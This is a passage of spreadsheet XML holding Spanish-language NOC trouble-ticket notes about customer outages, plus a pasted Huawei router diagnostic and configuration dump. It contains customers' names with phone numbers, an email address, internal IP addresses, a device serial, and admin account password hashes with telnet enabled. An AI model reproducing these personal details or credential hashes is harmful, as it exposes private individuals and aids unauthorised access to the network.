    <t>SERVICIO INESTABLE SEGUN TECNICO INDICA QUE NO HAY SUFICIENTE COBERTURA EN SITIO</t>
  </si>
  <si>
    <t>F4580192</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE GABRIEL ROLDAN 40148994 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001583348</t>
  </si>
  <si>
    <t>F4580194</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL ROLDAN 40148994 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001583348</t>
  </si>
  <si>
    <t>F4580223</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TÉCNICO QUIEN INDICA QUE ACTUALMENE SE ENCUENTRA A LA ESPERA DE QUE CLIENTE LE BRINDE PERMISOS DE INGRESO AL SITIO/// SE PROCEDE A PASAR LA FALLA A PC HASTA QUE CLIENTE LLEGUE A SITIO Y DE PERMISOS
2001633080
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 58269663
NÚMERO: 58269663
DURACIÓN: 0:02:09
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58269663
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 27/05/2022 14:17:29</t>
  </si>
  <si>
    <t>SE LLAMA A TÉCNICO 58269663 VALIDA QUE YA POSEE INTERNET DIRECTO A CPE COMO EN EQUIPOS DE CLIENTE, EN LLAMADA CON TECNICO SE COLOCA A CLIENTE EN CONFERENCIA Y CONFIRMA SERVICIO DE INTERNET || AUTORIZA CIERRE DE TICKET Y SOLICITA SE LE ENVIE CORREO GOSORIO@HOUSEANDGREEN.COM.GT
2001667024
COLA:
NOMBRE: A: 58269663
NÚMERO: 58269663
DURACIÓN: 0:09:44
ESTADO: CONECTADA
DETALLES: 58269663
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/05/2022 16:15:53</t>
  </si>
  <si>
    <t>F4580229</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARNOLD CABALLERO AL 31850297 CONFIRMA SERVICIO OPERATIVO Y ESTABLE **
ID 2001583171
**</t>
  </si>
  <si>
    <t>F4580276</t>
  </si>
  <si>
    <t>CLIENTE VALIDA EL CABLEADO Y REALIZA EL REINICIO DE LA PBX PERO AUN NO LEVANTA EL SERVICIO SE TIENE ALARMA DE RRA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE TIENE UN ASMI 54L EL CUAL ESTA ALARMADO DE LA SIGUIENTE FORMA, CLIENTE YA REINICIO EL EQUIPO Y LA PLANTA
PWR - VERDE
SYNC - VERDE
E1 SYNC - ROJO
ALM - ROJO
CLIENTE SE ENCUENTRA REVISANDO EL CABLEADO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MOISES JOVEL 78447975 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE MOISES NOS APOYA A REALIZAR PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES Y NOS CONFIRMA QUE YA COMPLETAN, NOS AUTORIZA ELC IERRE DE CASO</t>
  </si>
  <si>
    <t>F4580277</t>
  </si>
  <si>
    <t>SE APERTURA FALLA F4580407
|| CAIDA TOTAL || ATN910C-G COMAYAGUA 1 HUAWEI OCOMHNO1N1D1ENM1 || 10.123.24.23 || MASIVO_HN ||</t>
  </si>
  <si>
    <t>F4580281</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRA SICA 59305744 - 55348025 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001593908 - 2001594548</t>
  </si>
  <si>
    <t>F4580291</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001596943
**</t>
  </si>
  <si>
    <t>F4580300</t>
  </si>
  <si>
    <t>JIMMY HERNANDEZ-30945988 --- SE TIENE EN LINEA ##
2001591246
COLA:
NOMBRE: A: 30945988
NÚMERO: 011 50230945988
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: +50230945988
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 12:05:19</t>
  </si>
  <si>
    <t>F4580306</t>
  </si>
  <si>
    <t>SE LE SOLICITA  A MILTON GARCIA 55118638 (PROVEEDOR DE LA PBX) QUE REALICE PRUEBAS EN EL SERVICIO, SE LE INDICA QUE PERSONAL DE AVI REALIZÓ CAMBIOS EN LA CONFIGURACIÓN DEL GDN, COMENTA QUE NO SE ENCUENTRA EN OFICINA EN ESTE MOMENTO, SOLICITA SE LLAME AL 23795398, LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>INFORMA MILTON GARCIA 55118638 (PROVEEDOR DE LA PBX) QUE AUN NO LLEGA A LA INSTALACIONES DEL CLIENTE FINAL PARA VALIDAR, SOLICITA SE LE LLAME EN 30 MINUTOS. ID: 2001976458</t>
  </si>
  <si>
    <t>SE LE PLANTEA EL CASO A FRANCISCO RIVERA QUIEN COMENTA QUE PUEDE APOYAR A VALIDAR EL INCONVENIENTE CON EL CLIENTE A  LAS 2 PM YA QUE SE ENCUENTRA EN HORARIO DE ALMUERZO. SE LE INFORMA A MILTON QUE SE VALIDARÁ A ESA HORA. ID: 2001595845</t>
  </si>
  <si>
    <t>INFORMA MILTON GARCÍA (PROVEEDOR DE LA PBX) ID: 3001020596 QUE YA REALIZÓ PRUEBAS Y VALIDA QUE EL SERVICIO YA ESTÁ FUNCIONANDO DE FORMA CORRECTA, AUTORIZA EL CIERRE DEL CASO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OMAR AGUILAR AL 52175794 - 58046592 EN EL PRIMERER NUMERO  ENVIA A BUZON Y EL SEGUNDO INDICAN QUE ES NUMERO EQUIVOCADO || SE INTENTARA LUEGO NUEVAMENTE AL PRIMER NUMERO **
ID 2001973474 - 2001973667
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MILTON GARCIA  (PROVEEDOR DE LA PBX)  AL 55118638 NO RESPONDE, ENVIA A BUZON
SE INTENTARA LUEGO **
ID 2001995414
**</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A MILTON GARCIA 52175794 QUIEN COMENTA QUE EL PROBLEMA ES QUE EN SUS LLAMADAS SALIENTES DE LOS DID QUE NO TIENEN IDENTIFICADOR NO SE COMPLETAN, Y LAS LLAMADAS QUE SÍ TIENEN IDENTIFICADOR SÍ COMPLETAN SIN INCONVENIENTES. AL CONFIGURARLE UN IDENTIFICADOR A LOS DID LAS LLAMADAS SÍ COMPLETAN. ID: 2001595845</t>
  </si>
  <si>
    <t>SE LE INFORMA A MILTON GARCIA 55118638 QUE LA LLAMADA COMPLETA, INDICA QUE ESTE DID NO COMPLETABA AYER, REALIZÓ PRUEBAS Y YA COMPLETA, SOLICITA SE LE LLAME EL DÍA LUNES A LAS 8:30 AM PARA VALIDAR TODOS LOS DID AFECTADOS YA QUE NO SE ENCUENTRA EN OFICINAS.
RESULTADO: LLAMADA HECHA
NOMBRE: 55118638
NÚMERO: 55118638
INICIO: HOY, 08:22 A. M.
FIN: HOY, 08:23 A. M.
DURACIÓN: 0:58
ID DE LLAMADA: 2001726886</t>
  </si>
  <si>
    <t>F4580311</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. EDWIN AL 33330101 SOLICITA QUE SE LLAME AL SEÑOR DANIEL MARTINEZ GERENTE DE IT DE MEYKOS AL NUMERO 93285236 **
ID 2001609775
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL MARTINEZ AL 93285236 OPERADORA INDICA QUE NUMERO ES INCOMPLETO, SE INTENTARA LUEGO **
ID 2001609418
**</t>
  </si>
  <si>
    <t>F4580334</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO; ADICIONAL SE LLAMÓ/HABLÓ CON ALLAN CIFUENTES/CLIENTE 42266881 Y SE LE BRINDAN AVANCES DEL TICKET, ÉSTE INDICA QUE HAY PERSONAL EN SITIO LAS 24 HORAS.</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE ALAN CIFUENTES 42266881 INDICA QUE SI CUENTAN CON ENERGIA QUE YA REINICIO EQUIPOS Y NO LEVANTA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001612026
**</t>
  </si>
  <si>
    <t>F4580360</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN AL 98095777 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001613534
**</t>
  </si>
  <si>
    <t>F4580368</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 23091400 ATIENDE MIRNA VALIDA EL SERVICIO SE PROCEDE AL CIERRE DEL CASO.
3001089605
COLA:
NOMBRE: A: 0050323091400
NÚMERO: 0050323091400
DURACIÓN: 0:00:03
ESTADO: MARCANDO
DETALLES: 0050323091400
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 13:48:34</t>
  </si>
  <si>
    <t>LUEGO DEL REINICIO EQUIPO CONTINÚA EN EL MISMO ESTADO. TAMBIÉN APOYO REINICIANDO PLANTA PBX PANASONIC PERO CONTINÚA INCONVENIENTE, CLIENTE SOLICITA QUE SE COORDINE VISITA PARA EL DÍA LUNES A LAS 8 AM YA QUE ESTÁN POR RETIRARSE. ID DE LLAMADA: 2001615180
ESTADO ASMI54
PWR   VERDE
ALM   ROJO
SYNC  ROJO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FLOR DE MARÍA 72131366, CLIENTE UBICA EQUIPO ASMI54, SE LE SOLICITA REINICIARLO</t>
  </si>
  <si>
    <t>F4580370</t>
  </si>
  <si>
    <t>SE LLAMA A CLEITNE OSVALDO-62083478 SE TIENE EN LINEA ##
2001596971
COLA:
NOMBRE: A: 0050362083478
NÚMERO: 0050362083478
DURACIÓN: 0:00:48
ESTADO: CONECTADA
DETALLES: 0050362083478
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 12:21:15</t>
  </si>
  <si>
    <t>CLIENTE VALIDA QUE YA TIENE LLAMADAS Y VALIDA CIERRE ##
2001596971
COLA:
NOMBRE: A: 0050362083478
NÚMERO: 0050362083478
DURACIÓN: 0:03:52
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050362083478
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 12:24:22</t>
  </si>
  <si>
    <t>F4580378</t>
  </si>
  <si>
    <t>SR. LEONARDO MAX NORMALIZO CONEXIONES, APLICIO REINICIO, SE FUE LA ENERGIA COMERCIAL EN SITIO PERO ACTIVARON LA PLANTA, ENLACE QUEDO OPERATIVO Y ESTABLE.
&lt;PPOPGTPON1T1D05A03EIM2&gt;PING -C 3000 -S 1400 -M 30 -B  -VPN COM_ELECTRODOMESTICOS 10.87.207.43
  PING 10.87.207.43: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.87.207.43 PING STATISTICS ---
    3000 PACKET(S) TRANSMITTED
    3000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/43 MS
CONFIG DEL CPE:
OWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 7
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 1
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 2
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     10.207.50.49/32      UP         UP
ETHERNET0/0/0                     UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/4              10.87.207.43/29      UP         UP
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
LOOPBACK5                         10.212.198.137/32    UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
TUNNEL0/0/0                       10.212.198.137/32    UP         UP
VLANIF1                           192.167.51.1/24      UP         UP
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP DEVICE SLOT 0
AR617VW-LTE4EA'S DEVICE STATUS:
SLOT  SUB TYPE             ONLINE   POWER     REGISTER      ALARM        PRIMARY
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     -   AR617VW-LTE4EA   PRESENT  POWERON   REGISTERED    NORMAL       MASTER
-------------------------------------------------------------------------------
  BOARD NAME        : AR617VW-LTE4EA
  BOARD DESCRIPTION : AR617VW-LTE4EA
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
  PORT  PORT         OPTIC    MDI   SPEED  DUPLEX  FLOW-    PORT     POE
        TYPE         STATUS         (MBPS)         CTRL     STATE    STATE
-------------------------------------------------------------------------------
  0     GE(C)        -        AUTO  1000   FULL    DISABLE  UP       -
  1     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  2     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  3     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  4     GE(C)        -        AUTO  1000   FULL    DISABLE  UP       -
  5     GE(C)        -        AUTO  1000   FULL    DISABLE  UP       -
  6     VDSL(-)      -        -     5.696  -       -        DOWN     -
  7     WLAN(-)      -        -     -      -       -        UP       -
  8     WLAN(-)      -        -     -      -       -        UP       -
  9     CELLULAR(-)  -        -     -      -       -        -        -
-------------------------------------------------------------------------------
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt; DISP INT DES
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     UP      UP       WAN REDUDANTE/_/535200129T/_/
ETH0/0/0                      *DOWN   DOWN     NO ESTA EN USO
GE0/0/0                       UP      UP       LAN DEL CLIENTE
GE0/0/1                       *DOWN   DOWN     NO ESTA EN USO
GE0/0/2                       *DOWN   DOWN     NO ESTA EN USO
GE0/0/3                       *DOWN   DOWN     NO ESTA EN USO
GE0/0/4                       UP      UP       WAN PRINCIPAL/_/535200128T/_/
GE0/0/5(V)                    UP      DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
TUN0/0/0                      UP      UP       HUAWEI, AR SERIES, TUNNEL0/0/0 IN
                                               TERFACE
VLANIF1                       UP      UP       LAN DEL CLIENTE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               1 INTERFACE
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP ARP ALL
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.87.207.43    20AB-48A9-8A05            I -         GE0/0/4
10.87.207.41    084F-0AC8-68CD  17        D-0         GE0/0/4
10.87.207.42    20AB-48A9-89B9  17        D-0         GE0/0/4
192.167.51.1    20AB-48A9-8A04            I -         VLANIF1
192.167.51.50   6C1C-71E5-91EA  20        D-0         GE0/0/0
                                             1/-
192.167.51.3    0023-248F-AE31  19        D-0         GE0/0/0
                                             1/-
192.167.51.12   C074-AD4F-6839  20        D-0         GE0/0/0
                                             1/-
192.167.51.5    0023-246B-6588  19        D-0         GE0/0/0
                                             1/-
192.167.51.4    0023-2499-E085  19        D-0         GE0/0/0
                                             1/-
192.167.51.2    0023-2495-D99F  19        D-0         GE0/0/0
                                             1/-
------------------------------------------------------------------------------
TOTAL:10        DYNAMIC:8       STATIC:0     INTERFACE:2
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP MAC-AD
-------------------------------------------------------------------------------
MAC ADDRESS       VLAN/BRIDGE/VSI/BD      LEARNED-FROM               TYPE
-------------------------------------------------------------------------------
0023-246B-6588       1/-/-/-              GE0/0/0                    DYNAMIC
0023-248F-AE31       1/-/-/-              GE0/0/0                    DYNAMIC
0023-2495-D99F       1/-/-/-              GE0/0/0                    DYNAMIC
0023-2499-E085       1/-/-/-              GE0/0/0                    DYNAMIC
6C1C-71E5-91EA       1/-/-/-              GE0/0/0                    DYNAMIC
C074-AD4F-6839       1/-/-/-              GE0/0/0                    DYNAMIC
-------------------------------------------------------------------------------
TOTAL ITEMS DISPLAYED = 6
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP VER
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR610 V300R019C13SPC200)
COPYRIGHT (C) 2011-2021 HUAWEI TECH CO., LTD
HUAWEI AR617VW-LTE4EA ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 6 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 5 MINUTES
SDRAM MEMORY SIZE    : 1024    M BYTES
FLASH 0 MEMORY SIZE  : 1024    M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR-SRU617 VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR617VW-LTE4EA
4. BOOTROM  VERSION  : 1
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 0
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP CLOCK
2022-05-27 20:12:54
FRIDAY
TIME ZONE(DEFAULT ZONE NAME) : UTC+00:00
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP SN
EQUIPMENT SN(ESN): 21500104982SM6500581
LICENSE ESN: 21500104982SM6500581
SLOT  SUB TYPE             SN                       P/N
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     --  AR617VW-LTE4EA   21500104982SM6500581     50010498
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;DISP CUR
[V300R019C13SPC200]
#
 SYSNAME CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN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UNDO ICMP-REPLY FAST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UNDO ANTI-ATTACK ABNORMAL ENABLE
UNDO ANTI-ATTACK FRAGMENT ENABLE
UNDO ANTI-ATTACK ICMP-FLOOD ENABLE
UNDO ANTI-ATTACK TCP-SYN ENABLE
UNDO ANTI-ATTACK UDP-FLOOD ENABLE
#
 UNDO ICMP PORT-UNREACHABLE SEND
#
DHCP ENABLE
#
RADIUS-SERVER TEMPLATE DEFAULT
#
PKI REALM DEFAULT
 CERTIFICATE-CHECK NONE
#
SSL POLICY DEFAULT_POLICY TYPE SERVER
 PKI-REALM DEFAULT
 VERSION TLS1.2
 CIPHERSUITE RSA_AES_128_SHA256 RSA_AES_256_SHA256 ECDHE_RSA_AES128_GCM_SHA256 ECDHE_RSA_AES256_GCM_SHA384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DOMAIN DEFAULT
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
  RADIUS-SERVER DEFAULT
 DOMAIN DEFAULT_ADMIN
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
 LOCAL-USER ADMIN PASSWORD IRREVERSIBLE-CIPHER $1A$4}Q\G-_G!N$5(DS)P&lt;%&lt;IR&lt;\ZJN~K{#MB:HX]HUU-B8PK3MK7M&lt;$
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TERMINAL HTTP
 LOCAL-USER GESTIONIP PASSWORD IRREVERSIBLE-CIPHER $1A$!~RK4*||\;$K.UW3%B){Y&amp;UUVGNQXPU{L~Q7.)X{E[0}K!OJ!Q%$
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP FTP-DIRECTORY FLASH:/
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET TERMINAL HTTP
#
WEB
 SET FAST-CONFIGURATION STATE DISABLE
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.167.51.1 255.255.255.0
 QOS CAR INBOUND CIR 1024 CBS 192000 PBS 384000 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND CIR 1024 CBS 192000 PBS 384000 GREEN PASS YELLOW PASS RED DISCARD
#
INTERFACE ETHERNET0/0/0
 DESCRIPTION NO ESTA EN USO
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION LAN DEL CLIENTE
#
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION NO ESTA EN USO
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION NO ESTA EN USO
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION NO ESTA EN USO
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/535200128T/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 1024 KBPS
 IP ADDRESS 10.87.207.43 255.255.255.248
 UNDO ICMP HOST-UNREACHABLE SEND
 UNDO ICMP PORT-UNREACHABLE SEND
 UNDO ICMP TTL-EXCEEDED SEND
 OSPF NETWORK-TYPE P2MP
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE CELLULAR0/0/0
 DESCRIPTION WAN REDUDANTE/_/535200129T/_/
 DIALER ENABLE-CIRCULAR
 DIALER-GROUP 1
 APN-PROFILE INCOMEL.CLARO
 DIALER TIMER AUTODIAL 20
